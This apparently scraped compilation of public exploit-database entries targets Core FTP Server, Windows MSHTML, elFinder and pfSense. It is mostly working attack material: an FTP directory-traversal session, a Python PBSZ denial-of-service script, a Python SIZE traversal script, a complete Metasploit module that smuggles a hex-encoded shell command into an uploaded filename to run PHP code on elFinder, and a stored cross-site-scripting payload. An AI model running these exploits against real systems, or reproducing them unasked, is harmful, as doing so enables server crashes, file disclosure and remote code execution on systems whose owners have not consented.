Created: Monday July 13, 2009 7:55:11 PM
Modified: Monday July 13, 2009, 9:14:12 PM
Accessed: Monday July 13, 2009 7:55:11 PM

#nc -nv 192.168.0.2 21
(UNKNOWN) [192.168.0.2] 21 (ftp) open
220 Core FTP Server Version 2.0, build 674, 32-bit, installed 1 days ago Unregistered
USER anonymous
331 password required for anonymous
PASS anonymous@
230-Logged on
230
MDTM C:\..\..\..\..\..\..\Windows\System32\ARP.exe
213 20090713211412
HireHackking 
# Exploit Title: Core FTP 2.0 build 653 - 'PBSZ' - Unauthenticated - Denial of Service (PoC)
# Date: 2019-03-12
# Exploit Author: Hodorsec (hodorsec@protonmail.com / hodor@hodorsec.com)
# Vendor Homepage: http://www.coreftp.com/
# Software Link: http://coreftp.com/server/download/archive/CoreFTPServer653.exe
# Version: Version 2.0, build 653, 32-bit
# Tested on: Windows 8.1 6.3 (build 9600)
# CVE: N/A

# Description: 
# CoreFTP 2.0 is vulnerable to a DoS attack via the PBSZ command. Ironically, this command is being used for "Protection Buffer Size" 
# and CoreFTP responds unauthenticated.
# The PBSZ command in CoreFTP only allows for a certain length of the string to be vulnerable to a DoS.
# This script triggers the DoS and filling ECX with the intented buffer. 
# Although NSEH/SEH is overwritten, the executable binary is SafeSEH protected and no other assemblies are referenced.

# Replication:
# - Install CoreFTP and setup a domain with an IP and path
# - Start the service or click "Start"
# - No need to add users or set anything specific: just run the script and watch it crash

# Crash as service:
# (7e0.bf4): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# *** ERROR: Module load completed but symbols could not be loaded for C:\Program Files (x86)\CoreFTPServer\coresrvr.exe
# eax=00000000 ebx=00a5b048 ecx=42424242 edx=00000000 esi=00000258 edi=00000000
# eip=004491f5 esp=0128c4bc ebp=0129f684 iopl=0         nv up ei ng nz na po nc
# cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010282
# coresrvr+0x491f5:
# 004491f5 83b92c08000000  cmp     dword ptr [ecx+82Ch],0 ds:002b:42424a6e=????????

#!/usr/bin/env python
import sys, socket, struct, time
 
if len(sys.argv) <= 2:
    print "Usage: python " + sys.argv[0] + " [host] [port]"
    exit()
 
host = sys.argv[1]    
port = int(sys.argv[2])

# Maximum length
maxlen = 211

# Offsets
crash_ecx = 199
crash_nseh = 99

# Variables
prefix = "A" * crash_ecx
ecx = "B" * 4                                   # 004491f5; CMP DWORD PTR DS:[ECX+82c],0 
suffix = "C" * (maxlen - len(prefix + ecx))

# Payload
payload = prefix + ecx + suffix

print "[+] Connecting to " + host + "\n"

try:
        print "[+] Sending payload with " + str(len(payload)) + " length message..."

    
        req = (
                "PBSZ " + payload
        )
    
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(2)
        s.connect((host, port))
        s.send(req)
        s.recv(1024)
        s.close()

        time.sleep(0.5)
except Exception,e:
        print "[!] Error occured: " + str(e)
        print "[*] Crashed occured at buffer length: " + str(len(payload))
        sys.exit()
HireHackking 
# Exploit Title:  Microsoft Windows (CVE-2019-0541) MSHTML Engine "Edit" Remote Code Execution Vulnerability

# Google Dork: N/A

# Date: March, 13 2019

# Exploit Author:  Eduardo Braun Prado

# Vendor Homepage: http://www.microsoft.com/

# Software Link: http://www.microsoft.com/

# Version: Windows 7 SP1, Server 2008, Server 2012, Server 2012 R2, 8.0, 8.1, 10 (any) with full patches up to December 2018. both x86 and x64 architectures.

# Tested on: Windows 7 SP1, Server 2008, Server 2012, Server 2012 R2, 8.0, 8.1, 10 (any) with full patches up to December 2018. both x86 and x64 architectures.

# CVE : CVE-2019-0541


The Microsoft Windows MSHTML Engine is prone to a vulnerability that allows attackers to execute arbitrary code on vulnerable systems because of improper validation
of specially crafted web documents (html, xhtml, etc). The issue is triggered when users "Edit" specially crafted documents containing a 'meta' HTML tag set to 'ProgId' and its content set to a 'ProgId' of choice eg. 'HTAFILE', usually through MS IE browser or a MS Office
component (The Edit HTML app 'msohtmed.exe'). Some Office versions will add an "Edit" menu option to html and xhtml files, making it possible to exploit the vulnerability locally or remotely (usually through network shares)
This is the 'ProgId' exploit: Similar to the old Windows Shell / Internet Explorer ClassId vulnerabilit(ies) that haunted Windows 98/2000/XP in the past.'.
On patched systems, the PoC file will always open in Notepad.


Video demo: https://youtu.be/OdEwBY7rXMw


Download PoC (in ZIP archive) with full details from: https://onedrive.live.com/?id=AFCB9116C8C0AAF4%21366&cid=AFCB9116C8C0AAF4


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46536.zip
HireHackking 
# Exploit Title: CoreFTP Server FTP / SFTP Server v2 - Build 674  SIZE Directory Traversal
# Google Dork: N/A
# Date: 4/27/2019
# Exploit Author: Kevin Randall
# Vendor Homepage: https://www.coreftp.com
# Software Link: http://www.coreftp.com/server/index.html
# Version: Firmware: CoreFTP Server FTP / SFTP Server v2 - Build 674
# Tested on: Windows 7
# CVE : CVE-2019-9648


#!/usr/bin/python

import socket
import sys

########################################################
###########Set Variables For Script Here################

file_to_look_for = "nslookup.exe"
local_disk_drive = " C:"
path_traversal = "\..\..\..\..\..\Windows\System32\\"

########################################################
print ("""
         #####  #     # #######        #####    ###     #    #####         #####   #####  #        #####
         #     # #     # #             #     #  #   #   ##   #     #       #     # #     # #    #  #     #
         #       #     # #                   # #     # # #   #     #       #     # #       #    #  #     #
         #       #     # #####   #####  #####  #     #   #    ###### #####  ###### ######  #    #   #####
         #        #   #  #             #       #     #   #         #             # #     # ####### #     #
         #     #   # #   #             #        #   #    #   #     #       #     # #     #      #  #     #
          #####     #    #######       #######   ###   #####  #####         #####   #####       #   #####

          #######
          #       #    # #####  #       ####  # #####
          #        #  #  #    # #      #    # #   #
          #####     ##   #    # #      #    # #   #
          #         ##   #####  #      #    # #   #
          #        #  #  #      #      #    # #   #
          ####### #    # #      ######  ####  #   #

          #     #                                       ######         #     #    #
          #  #  # #####  # ##### ##### ###### #    #    #     # #   # ###    #   #  ###### #    # # #    #
          #  #  # #    # #   #     #   #      ##   #    #     #  # #   #     #  #   #      #    # # ##   #
          #  #  # #    # #   #     #   #####  # #  #    ######    #          ###    #####  #    # # # #  #
          #  #  # #####  #   #     #   #      #  # #    #     #   #    #     #  #   #      #    # # #  # #
          #  #  # #   #  #   #     #   #      #   ##    #     #   #   ###    #   #  #       #  #  # #   ##
           ## ##  #    # #   #     #   ###### #    #    ######    #    #     #    # ######   ##   # #    #

           ######
           #     #   ##   #    # #####    ##   #      #
           #     #  #  #  ##   # #    #  #  #  #      #
           ######  #    # # #  # #    # #    # #      #
           #   #   ###### #  # # #    # ###### #      #
           #    #  #    # #   ## #    # #    # #      #
           #     # #    # #    # #####  #    # ###### ######

           """)
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect = s.connect(('192.168.0.4',21))

s.recv(1024)
s.send('USER anonymous\r\n')

s.recv(1024)
s.send('PASS anonymous\r\n')

s.recv(1024)
s.recv(1024)
s.send('SIZE' +local_disk_drive+path_traversal+file_to_look_for + '\r\n')
result = s.recv(2048)
trimmedoutput = result.strip()
splitoutput = trimmedoutput.split(' ')
realresult = unicode (trimmedoutput,'utf-8')
realresult2 = unicode (splitoutput[1],'utf-8')
isnum = realresult.isnumeric()
isnum2 = realresult2.isnumeric()
if isnum2:
    print "The file " + file_to_look_for + " exist on the remote server. Here is the filesize:" + splitoutput[1]
else:
    print "The file " + file_to_look_for + " does not exist on the remote server or one of the variables declared is incorrect."

s.send('QUIT\r\n')

s.close
HireHackking 
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'elFinder PHP Connector exiftran Command Injection',
      'Description'    => %q{
        This module exploits a command injection vulnerability in elFinder
        versions prior to 2.1.48.

        The PHP connector component allows unauthenticated users to upload
        files and perform file modification operations, such as resizing and
        rotation of an image. The file name of uploaded files is not validated,
        allowing shell metacharacters.

        When performing image operations on JPEG files, the filename is passed
        to the `exiftran` utility without appropriate sanitization, causing
        shell commands in the file name to be executed, resulting in remote
        command injection as the web server user.

        The PHP connector is not enabled by default.

        The system must have `exiftran` installed and in `$PATH`.

        This module has been tested successfully on elFinder versions 2.1.47,
        2.1.20 and 2.1.16 on Ubuntu.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Thomas Chauchefoin', # Discovery
          'q3rv0',              # Exploit
          'bcoles'              # Metasploit
        ],
      'References'     =>
        [
          ['CVE', '2019-9194'],
          ['EDB', '46481'],
          ['URL', 'https://github.com/Studio-42/elFinder/releases/tag/2.1.48'],
          ['URL', 'https://www.secsignal.org/news/cve-2019-9194-triggering-and-exploiting-a-1-day-vulnerability/']
        ],
      'Arch'           => ARCH_PHP,
      'Platform'       => 'php',
      'Targets'        => [['Auto', {}]],
      'Privileged'     => false,
      'DisclosureDate' => '2019-02-26',
      'DefaultTarget'  => 0))

    register_options [
      OptString.new('TARGETURI', [true, 'The base path to elFinder', '/elFinder/'])
    ]
  end

  #
  # Check if /php/connector.minimal.php exists and is executable
  #
  def check
    uri = normalize_uri(target_uri.path, 'php', 'connector.minimal.php')
    res = send_request_cgi('uri' => uri)

    unless res
      vprint_error 'Connection failed'
      return CheckCode::Unknown
    end

    unless res.code == 200
      vprint_status "#{uri} does not exist"
      return CheckCode::Safe
    end

    if res.body.include? '<?php'
      vprint_status 'PHP is not enabled'
      return CheckCode::Safe
    end

    CheckCode::Detected
  end

  #
  # Upload PHP payload
  #
  def upload(fname)
    # Small JPEG file from:
    # https://github.com/mathiasbynens/small/blob/master/jpeg.jpg
    jpeg = %w[
      FF D8 FF DB 00 43 00 03 02 02 02 02 02 03 02 02
      02 03 03 03 03 04 06 04 04 04 04 04 08 06 06 05
      06 09 08 0A 0A 09 08 09 09 0A 0C 0F 0C 0A 0B 0E
      0B 09 09 0D 11 0D 0E 0F 10 10 11 10 0A 0C 12 13
      12 10 13 0F 10 10 10 FF C9 00 0B 08 00 01 00 01
      01 01 11 00 FF CC 00 06 00 10 10 05 FF DA 00 08
      01 01 00 00 3F 00 D2 CF 20 FF D9
    ]
    jpeg = [jpeg.join].pack('H*')
    jpeg << rand_text_alphanumeric(50..100)
    jpeg << "<?php #{payload.encoded} ?>"
    jpeg << rand_text_alphanumeric(50..100)

    data = Rex::MIME::Message.new
    data.add_part('upload', nil, nil, 'form-data; name="cmd"')
    data.add_part('l1_Lw', nil, nil, 'form-data; name="target"')
    data.add_part(jpeg, 'image/jpeg', nil, %(form-data; name="upload[]"; filename="#{fname}"))
    post_data = data.to_s

    print_status("Uploading payload '#{fname}' (#{post_data.length} bytes)")

    res = send_request_cgi(
      'method' => 'POST',
      'uri'    => normalize_uri(target_uri.path, 'php', 'connector.minimal.php'),
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    )

    unless res
      fail_with Failure::Unreachable, 'Connection failed'
    end

    unless res.code == 200
      fail_with Failure::UnexpectedReply, 'Unexpected reply'
    end

    unless res.body.include?('"added"')
      fail_with Failure::UnexpectedReply, "Upload failed: #{res.body}"
    end

    if res.body.include?('"error"') || res.body.include?('"warning"')
      fail_with Failure::UnexpectedReply, "Upload failed: #{res.body}"
    end

    json_res = JSON.parse(res.body) rescue nil

    if json_res.nil? || json_res['added'].empty?
      fail_with Failure::UnexpectedReply, "Upload failed: #{res.body}"
    end

    json_res['added'].first['hash'] || ''
  end

  #
  # Trigger the command injection via image rotation functionality
  # Rotates image by 180 degrees to trigger `exiftran` code path
  #
  def trigger(hash)
    print_status 'Triggering vulnerability via image rotation ...'

    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'php', 'connector.minimal.php'),
      'vars_get' => {
        'target' => hash,
        'degree' => '180',
        'mode'   => 'rotate',
        'cmd'    => 'resize'
      }
    }, 5)

    unless res
      fail_with Failure::Unreachable, 'Connection failed'
    end

    if res.body.include?('"error"') || res.body.include?('"warning"')
      fail_with Failure::UnexpectedReply, "Image rotate failed: #{res.body}"
    end
  end

  #
  # Delete uploaded file
  #
  def delete_file(hash)
    print_status 'Removing uploaded file ...'

    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'php', 'connector.minimal.php'),
      'vars_get' => {
        'cmd' => 'rm',
        'targets[]' => hash
      }
    }, 15)

    unless res
      print_status 'Connection failed'
      return
    end

    if res.body.include?('errFileNotFound')
      print_error "Could not delete uploaded file. Unexpected reply: #{res.body}"
      return
    end

    print_good 'Deleted uploaded file'
  end

  #
  # Execute payload
  #
  def execute_payload(php_fname)
    path = normalize_uri(target_uri.path, 'php', php_fname)

    print_status "Executing payload (#{path}) ..."

    res = send_request_cgi({
      'uri' => path
    }, 15)

    unless res
      print_status 'No reply'
      return
    end

    unless res.code == 200
      fail_with Failure::UnexpectedReply, "Executing payload failed (HTTP #{res.code})"
    end
  end

  #
  # Remove uploaded file
  #
  def cleanup
    delete_file @hash unless @hash.nil?
  ensure
    super
  end

  #
  # upload && execute
  #
  def exploit
    unless check == CheckCode::Detected
      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
    end

    fname = rand_text_alphanumeric(6..10)
    php_fname = ".#{rand_text_alphanumeric(6..10)}.php"

    # Max file name length is ~250 characters
    # and characters such as `/` are forbidden.
    # Hex encoded stager copies the uploaded file from the `files` directory
    # to the working directory (`php`) and changes the extension to `.php`
    # The stager is decoded with xxd when the vuln is triggered.
    stager = "cp ../files/#{fname}.jpg*echo* #{php_fname}"

    # Upload our payload jpg file with encoded stager in the filename
    jpg_fname = "#{fname}.jpg;echo #{stager.unpack('H*').flatten.first} |xxd -r -p |sh& #.jpg"
    @hash = upload jpg_fname

    if @hash.to_s == ''
      fail_with Failure::Unknown, 'Upload failed: Failed to retrieve file hash ID'
    end

    trigger @hash

    register_file_for_cleanup php_fname

    execute_payload php_fname
  end
end
HireHackking 
# Exploit Title: pfSense 2.4.4-p1 (HAProxy Package 0.59_14) - Stored Cross-Site Scripting 
# Date: 13.02.2019 
# Exploit Author: Gionathan "John" Reale 
# Vendor Homepage: https://www.pfsense.org 
# Version: 2.4.4-p1/0.59_14 
# Software Link: N/A
# Google Dork: N/A
# CVE:2019-8953 

################################################################################################################################## 
Introduction pfSense® software is a free, open source customized distribution of FreeBSD specifically tailored for use as a firewall and router that is entirely managed via web interface. 
In addition to being a powerful, flexible firewalling and routing platform, it includes a long list of related features and a package system allowing further expandability without adding bloat and potential security vulnerabilities to the base distribution. 
HAProxy is free, open source software that provides a high availability load balancer and proxy server for TCP and HTTP-based applications that spreads requests across multiple servers. 
################################################################################# 

Example: URL https://192.168.1.1/haproxy/haproxy_listeners_edit.php 
PARAMETER Description 
PAYLOAD "><script>alert("test")</script>